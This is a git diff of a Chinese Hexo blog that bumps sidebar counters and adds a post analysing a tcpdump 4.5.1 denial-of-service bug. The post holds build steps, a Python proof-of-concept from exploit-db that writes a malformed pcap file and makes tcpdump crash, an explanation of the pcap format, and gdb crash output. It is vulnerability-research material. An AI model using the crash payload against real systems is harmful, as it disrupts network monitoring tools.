diff --git a/2000/01/01/hello-world/index.html b/2000/01/01/hello-world/index.html
index e254fbf2..22d00ecd 100644
--- a/2000/01/01/hello-world/index.html
+++ b/2000/01/01/hello-world/index.html
@@ -558,7 +558,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -580,7 +580,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -651,7 +651,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2018/11/16/BIBA访问控制模型实现(python)/index.html b/2018/11/16/BIBA访问控制模型实现(python)/index.html
index c4fbeab0..e8c2b707 100644
--- a/2018/11/16/BIBA访问控制模型实现(python)/index.html
+++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html
@@ -730,7 +730,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -752,7 +752,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -839,7 +839,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2018/12/15/miio-control/index.html b/2018/12/15/miio-control/index.html
index c045a139..33aa6878 100644
--- a/2018/12/15/miio-control/index.html
+++ b/2018/12/15/miio-control/index.html
@@ -632,7 +632,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -654,7 +654,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -741,7 +741,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2018/12/23/基于规则引擎发现IOT设备/index.html b/2018/12/23/基于规则引擎发现IOT设备/index.html
index 7f0efdce..77ba925f 100644
--- a/2018/12/23/基于规则引擎发现IOT设备/index.html
+++ b/2018/12/23/基于规则引擎发现IOT设备/index.html
@@ -544,8 +544,8 @@
 
           <div class="post-nav-prev post-nav-item">
             
-              <a href="/2019/01/16/wifi半双工侧信道攻击学习笔记/" rel="prev" title="wifi半双工侧信道攻击学习笔记">
-                wifi半双工侧信道攻击学习笔记 <i class="fa fa-chevron-right"></i>
+              <a href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" rel="prev" title="TCPDUMP拒绝服务攻击漏洞">
+                TCPDUMP拒绝服务攻击漏洞 <i class="fa fa-chevron-right"></i>
               </a>
             
           </div>
@@ -632,7 +632,7 @@
               
                 <a href="/archives/">
               
-                  <span class="site-state-item-count">15</span>
+                  <span class="site-state-item-count">16</span>
                   <span class="site-state-item-name">日志</span>
                 </a>
               </div>
@@ -654,7 +654,7 @@
               
               <div class="site-state-item site-state-tags">
                 <a href="/tags/index.html">
-                  <span class="site-state-item-count">29</span>
+                  <span class="site-state-item-count">31</span>
                   <span class="site-state-item-name">标签</span>
                 </a>
               </div>
@@ -741,7 +741,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">41.4k</span>
+    <span title="Site words total count">44.8k</span>
   
 </div>
 
diff --git a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
new file mode 100644
index 00000000..499e312e
--- /dev/null
+++ b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
@@ -0,0 +1,1429 @@
+<!DOCTYPE html>
+
+
+
+  
+
+
+<html class="theme-next gemini use-motion" lang="zh-Hans">
+<head><meta name="generator" content="Hexo 3.8.0">
+  <meta charset="UTF-8">
+<meta http-equiv="X-UA-Compatible" content="IE=edge">
+<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
+<meta name="theme-color" content="#222">
+
+
+
+
+
+
+
+
+
+<meta http-equiv="Cache-Control" content="no-transform">
+<meta http-equiv="Cache-Control" content="no-siteapp">
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+  
+  
+  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
+
+
+
+
+
+
+
+<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
+
+<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
+
+
+  <link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
+
+
+  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
+
+
+
+
+
+  <meta name="keywords" content="TCPDUMP,拒绝服务攻击,">
+
+
+
+
+
+
+
+
+
+
+<meta name="description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的">
+<meta name="keywords" content="TCPDUMP,拒绝服务攻击">
+<meta property="og:type" content="article">
+<meta property="og:title" content="TCPDUMP拒绝服务攻击漏洞">
+<meta property="og:url" content="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html">
+<meta property="og:site_name" content="混元霹雳手">
+<meta property="og:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的">
+<meta property="og:locale" content="zh-Hans">
+<meta property="og:updated_time" content="2019-07-01T09:28:40.813Z">
+<meta name="twitter:card" content="summary">
+<meta name="twitter:title" content="TCPDUMP拒绝服务攻击漏洞">
+<meta name="twitter:description" content="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍 tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的">
+
+
+
+<script type="text/javascript" id="hexo.configurations">
+  var NexT = window.NexT || {};
+  var CONFIG = {
+    root: '/',
+    scheme: 'Gemini',
+    version: '5.1.4',
+    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
+    fancybox: true,
+    tabs: true,
+    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
+    duoshuo: {
+      userId: '0',
+      author: '博主'
+    },
+    algolia: {
+      applicationID: '',
+      apiKey: '',
+      indexName: '',
+      hits: {"per_page":10},
+      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
+    }
+  };
+</script>
+
+
+
+  <link rel="canonical" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
+
+
+
+
+
+  <title>TCPDUMP拒绝服务攻击漏洞 | 混元霹雳手</title>
+  
+
+
+
+
+
+
+
+
+</head>
+
+<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
+
+  
+  
+    
+  
+
+  <div class="container sidebar-position-left page-post-detail">
+    <div class="headband"></div>
+
+    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
+      <div class="header-inner"><div class="site-brand-wrapper">
+  <div class="site-meta ">
+    
+
+    <div class="custom-logo-site-title">
+      <a href="/" class="brand" rel="start">
+        <span class="logo-line-before"><i></i></span>
+        <span class="site-title">混元霹雳手</span>
+        <span class="logo-line-after"><i></i></span>
+      </a>
+    </div>
+      
+        <p class="site-subtitle"></p>
+      
+  </div>
+
+  <div class="site-nav-toggle">
+    <button>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+      <span class="btn-bar"></span>
+    </button>
+  </div>
+</div>
+
+<nav class="site-nav">
+  
+
+  
+    <ul id="menu" class="menu">
+      
+        
+        <li class="menu-item menu-item-home">
+          <a href="/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
+            
+            首页
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-about">
+          <a href="/about/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
+            
+            关于
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-tags">
+          <a href="/tags/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
+            
+            标签
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-categories">
+          <a href="/categories/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
+            
+            分类
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-archives">
+          <a href="/archives/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
+            
+            归档
+          </a>
+        </li>
+      
+        
+        <li class="menu-item menu-item-bookmarks">
+          <a href="/bookmarks/" rel="section">
+            
+              <i class="menu-item-icon fa fa-fw fa-map"></i> <br>
+            
+            书签
+          </a>
+        </li>
+      
+
+      
+        <li class="menu-item menu-item-search">
+          
+            <a href="javascript:;" class="popup-trigger">
+          
+            
+              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
+            
+            搜索
+          </a>
+        </li>
+      
+    </ul>
+  
+
+  
+    <div class="site-search">
+      
+  <div class="popup search-popup local-search-popup">
+  <div class="local-search-header clearfix">
+    <span class="search-icon">
+      <i class="fa fa-search"></i>
+    </span>
+    <span class="popup-btn-close">
+      <i class="fa fa-times-circle"></i>
+    </span>
+    <div class="local-search-input-wrapper">
+      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
+    </div>
+  </div>
+  <div id="local-search-result"></div>
+</div>
+
+
+
+    </div>
+  
+</nav>
+
+
+
+ </div>
+    </header>
+
+    <main id="main" class="main">
+      <div class="main-inner">
+        <div class="content-wrap">
+          <div id="content" class="content">
+            
+
+  <div id="posts" class="posts-expand">
+    
+
+  
+
+  
+  
+  
+
+  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
+  
+  
+  
+  <div class="post-block">
+    <link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2018/12/25/TCPDUMP拒绝服务攻击漏洞/">
+
+    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
+      <meta itemprop="name" content="Cool-Y">
+      <meta itemprop="description" content>
+      <meta itemprop="image" content="/images/avatar.png">
+    </span>
+
+    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
+      <meta itemprop="name" content="混元霹雳手">
+    </span>
+
+    
+      <header class="post-header">
+
+        
+        
+          <h1 class="post-title" itemprop="name headline">TCPDUMP拒绝服务攻击漏洞</h1>
+        
+
+        <div class="post-meta">
+          <span class="post-time">
+            
+              <span class="post-meta-item-icon">
+                <i class="fa fa-calendar-o"></i>
+              </span>
+              
+                <span class="post-meta-item-text">发表于</span>
+              
+              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-12-25T12:26:05+08:00">
+                2018-12-25
+              </time>
+            
+
+            
+
+            
+          </span>
+
+          
+            <span class="post-category">
+            
+              <span class="post-meta-divider">|</span>
+            
+              <span class="post-meta-item-icon">
+                <i class="fa fa-folder-o"></i>
+              </span>
+              
+                <span class="post-meta-item-text">分类于</span>
+              
+              
+                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
+                  <a href="/categories/二进制/" itemprop="url" rel="index">
+                    <span itemprop="name">二进制</span>
+                  </a>
+                </span>
+
+                
+                
+              
+            </span>
+          
+
+          
+            
+              <span class="post-comments-count">
+                <span class="post-meta-divider">|</span>
+                <span class="post-meta-item-icon">
+                  <i class="fa fa-comment-o"></i>
+                </span>
+                <a href="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/#comments" itemprop="discussionUrl">
+                  <span class="post-comments-count gitment-comments-count" data-xid="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" itemprop="commentsCount"></span>
+                </a>
+              </span>
+            
+          
+
+          
+          
+             <span id="/2018/12/25/TCPDUMP拒绝服务攻击漏洞/" class="leancloud_visitors" data-flag-title="TCPDUMP拒绝服务攻击漏洞">
+               <span class="post-meta-divider">|</span>
+               <span class="post-meta-item-icon">
+                 <i class="fa fa-eye"></i>
+               </span>
+               
+                 <span class="post-meta-item-text">阅读次数&#58;</span>
+               
+                 <span class="leancloud-visitors-count"></span>
+             </span>
+          
+
+          
+
+          
+            <div class="post-wordcount">
+              
+                
+                <span class="post-meta-item-icon">
+                  <i class="fa fa-file-word-o"></i>
+                </span>
+                
+                <span title="字数统计">
+                  3.4k 字
+                </span>
+              
+
+              
+                <span class="post-meta-divider">|</span>
+              
+
+              
+                <span class="post-meta-item-icon">
+                  <i class="fa fa-clock-o"></i>
+                </span>
+                
+                <span title="阅读时长">
+                  16 分钟
+                </span>
+              
+            </div>
+          
+
+          
+
+        </div>
+      </header>
+    
+
+    
+    
+    
+    <div class="post-body" itemprop="articleBody">
+
+      
+      
+
+      
+        <h1 id="TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><a href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析" class="headerlink" title="TCPDUMP 4.5.1 拒绝服务攻击漏洞分析"></a>TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</h1><h2 id="Tcpdump介绍"><a href="#Tcpdump介绍" class="headerlink" title="Tcpdump介绍"></a>Tcpdump介绍</h2><ol>
+<li>tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac OS X、HP-UX和AIX 等等。在这些系统中，tcpdump 需要使用libpcap这个捕捉数据的库。其在Windows下的版本称为WinDump；它需要WinPcap驱动，相当于在Linux平台下的libpcap.</li>
+<li>tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。</li>
+<li>也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的其他计算机的安全存在威胁。</li>
+</ol>
+<h2 id="分析环境"><a href="#分析环境" class="headerlink" title="分析环境"></a>分析环境</h2><ul>
+<li>Ubuntu 16.04.4 LTS i686</li>
+<li>tcpdump 4.5.1</li>
+<li>gdb with peda</li>
+</ul>
+<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>这个漏洞触发的原因是，tcpdump在处理特殊的pcap包的时候，由于对数据包传输数据长度没有进行严格的控制，导致在连续读取数据包中内容超过一定长度后，会读取到无效的内存空间，从而导致拒绝服务的发生。对于这个漏洞，首先要对pcap包的结构进行一定的分析，才能够最后分析出漏洞的成因，下面对这个漏洞进行复现。</p>
+<h3 id="编译安装tcpdump"><a href="#编译安装tcpdump" class="headerlink" title="编译安装tcpdump"></a>编译安装tcpdump</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1.	# apt-get install libpcap-dev</span><br><span class="line">2.	# dpkg -l libpcap-dev</span><br><span class="line">3.	# wget https://www.exploit-db.com/apps/973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">4.	# tar -zxvf 973a2513d0076e34aa9da7e15ed98e1b-tcpdump-4.5.1.tar.gz</span><br><span class="line">5.	# cd tcpdump-4.5.1/</span><br><span class="line">6.	# ./configure</span><br><span class="line">7.	# make</span><br><span class="line">8.	# make install</span><br><span class="line">9.	# tcpdump –-version</span><br><span class="line">          tcpdump version 4.5.1</span><br><span class="line">          libpcap version 1.7.4</span><br></pre></td></tr></table></figure>
+<h3 id="生成payload（来自exploit-db-payload）"><a href="#生成payload（来自exploit-db-payload）" class="headerlink" title="生成payload（来自exploit-db payload）"></a>生成payload（来自exploit-db payload）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: tcpdump 4.5.1 Access Violation Crash</span><br><span class="line"># Date: 31st May 2016</span><br><span class="line"># Exploit Author: David Silveiro</span><br><span class="line"># Vendor Homepage: http://www.tcpdump.org</span><br><span class="line"># Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz</span><br><span class="line"># Version: 4.5.1</span><br><span class="line"># Tested on: Ubuntu 14 LTS</span><br><span class="line">from subprocess import call</span><br><span class="line">from shlex import split</span><br><span class="line">from time import sleep</span><br><span class="line"></span><br><span class="line">def crash():</span><br><span class="line">    command = &apos;tcpdump -r crash&apos;</span><br><span class="line">    buffer     =   &apos;\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00&lt;\x9c7@\xff\x00&apos;</span><br><span class="line">    buffer     +=  &apos;\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a&apos;</span><br><span class="line">    buffer     +=  &quot;\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&amp;\x80\x18\&apos;&quot;</span><br><span class="line">    buffer     +=  &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos;</span><br><span class="line">    with open(&apos;crash&apos;, &apos;w+b&apos;) as file:</span><br><span class="line">        file.write(buffer)</span><br><span class="line">    try:</span><br><span class="line">        call(split(command))</span><br><span class="line">        print(&quot;Exploit successful!             &quot;)</span><br><span class="line">    except:</span><br><span class="line">        print(&quot;Error: Something has gone wrong!&quot;)</span><br><span class="line">def main():</span><br><span class="line">    print(&quot;Author:   David Silveiro                           &quot;)</span><br><span class="line">    print(&quot;   tcpdump version 4.5.1 Access Violation Crash    &quot;)</span><br><span class="line">    sleep(2)</span><br><span class="line">    crash()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
+<h2 id="崩溃分析"><a href="#崩溃分析" class="headerlink" title="崩溃分析"></a>崩溃分析</h2><h3 id="pcap包格式"><a href="#pcap包格式" class="headerlink" title="pcap包格式"></a>pcap包格式</h3><p>首先来分析一下pcap包的格式，首先是pcap文件头的内容，在.h有所定义，这里将结构体以及对应变量含义都列出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">struct pcap_file_header &#123;</span><br><span class="line">        bpf_u_int32 magic;</span><br><span class="line">        u_short version_major;</span><br><span class="line">        u_short version_minor;</span><br><span class="line">        bpf_int32 thiszone;     /* gmt to local correction */</span><br><span class="line">        bpf_u_int32 sigfigs;    /* accuracy of timestamps */</span><br><span class="line">        bpf_u_int32 snaplen;    /* max length saved portion of each pkt */</span><br><span class="line">        bpf_u_int32 linktype;   /* data link type (LINKTYPE_*) */</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p>
+<p>看一下各字段的含义：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> magic：   4字节 pcap文件标识 目前为“d4 c3 b2 a1”</span><br><span class="line"> major：   2字节 主版本号     #define PCAP_VERSION_MAJOR 2</span><br><span class="line"> minor：   2字节 次版本号     #define PCAP_VERSION_MINOR 4</span><br><span class="line"> thiszone：4字节 时区修正     并未使用，目前全为0</span><br><span class="line"> sigfigs： 4字节 精确时间戳   并未使用，目前全为0</span><br><span class="line"> snaplen： 4字节 抓包最大长度 如果要抓全，设为0x0000ffff（65535），</span><br><span class="line">          tcpdump -s 0就是设置这个参数，缺省为68字节</span><br><span class="line"> linktype：4字节 链路类型    一般都是1：ethernet</span><br><span class="line"></span><br><span class="line">struct pcap_pkthdr &#123;</span><br><span class="line">        struct timeval ts;      /* time stamp */</span><br><span class="line">        bpf_u_int32 caplen;     /* length of portion present */</span><br><span class="line">        bpf_u_int32 len;        /* length this packet (off wire) */</span><br><span class="line">&#125;;</span><br><span class="line">struct timeval &#123;</span><br><span class="line">        long            tv_sec;         /* seconds (XXX should be time_t) */</span><br><span class="line">        suseconds_t     tv_usec;        /* and microseconds */</span><br><span class="line">&#125;;</span><br><span class="line"> ts：    8字节 抓包时间 4字节表示秒数，4字节表示微秒数</span><br><span class="line"> caplen：4字节 保存下来的包长度（最多是snaplen，比如68字节）</span><br><span class="line"> len：   4字节 数据包的真实长度，如果文件中保存的不是完整数据包，可能比caplen大</span><br></pre></td></tr></table></figure></p>
+<p>其中len变量是值得关注的，因为在crash文件中，对应len变量的值为00 3C 9C 37<br>这是一个很大的值，读取出来就是379C3C00，数非常大，实际上在wireshark中打开这个crash文件，就会报错，会提示这个数据包的长度已经超过了范围，而换算出来的长度就是379C3C00，这是触发漏洞的关键。</p>
+<h3 id="gdb调试"><a href="#gdb调试" class="headerlink" title="gdb调试"></a>gdb调试</h3><p>首先通过gdb运行tcpdump，用-r参数打开poc生成的crash，tcp崩溃，到达漏洞触发位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">1.	Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">2.	[----------------------------------registers-----------------------------------]</span><br><span class="line">3.	EAX: 0x1</span><br><span class="line">4.	EBX: 0x81e33bd --&gt; 0x0</span><br><span class="line">5.	ECX: 0x2e (&apos;.&apos;)</span><br><span class="line">6.	EDX: 0x0</span><br><span class="line">7.	ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)</span><br><span class="line">8.	EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)</span><br><span class="line">9.	EBP: 0x10621</span><br><span class="line">10.	ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:   mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">11.	EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;:  movzx  edx,BYTE PTR [ebx+ebp*2+0x1])</span><br><span class="line">12.	EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)</span><br><span class="line">13.	[-------------------------------------code-------------------------------------]</span><br><span class="line">14.	   0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;:      je     0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;</span><br><span class="line">15.	   0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;:      mov    ebx,DWORD PTR [esp+0x18]</span><br><span class="line">16.	   0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;:     sub    esp,0x4</span><br><span class="line">17.	=&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;:     movzx  edx,BYTE PTR [ebx+ebp*2+0x1]</span><br><span class="line">18.	   0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;:     movzx  ecx,BYTE PTR [ebx+ebp*2]</span><br><span class="line">19.	   0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;:     push   edx</span><br><span class="line">20.	   0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;:     mov    ebx,edx</span><br><span class="line">21.	   0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;:     mov    DWORD PTR [esp+0x18],edx</span><br><span class="line">22.	[------------------------------------stack-------------------------------------]</span><br><span class="line">23.	0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:  mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">24.	0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c</span><br><span class="line">25.	0008| 0xbfffe1b4 --&gt; 0x1</span><br><span class="line">26.	0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)</span><br><span class="line">27.	0016| 0xbfffe1bc --&gt; 0x0</span><br><span class="line">28.	0020| 0xbfffe1c0 --&gt; 0x0</span><br><span class="line">29.	0024| 0xbfffe1c4 --&gt; 0x7ffffff9</span><br><span class="line">30.	0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x0</span><br><span class="line">31.	[------------------------------------------------------------------------------]</span><br><span class="line">32.	Legend: code, data, rodata, value</span><br><span class="line">33.	Stopped reason: SIGSEGV</span><br><span class="line">34.	hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">35.	    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">36.	91                      s2 = *cp++;</span><br></pre></td></tr></table></figure></p>
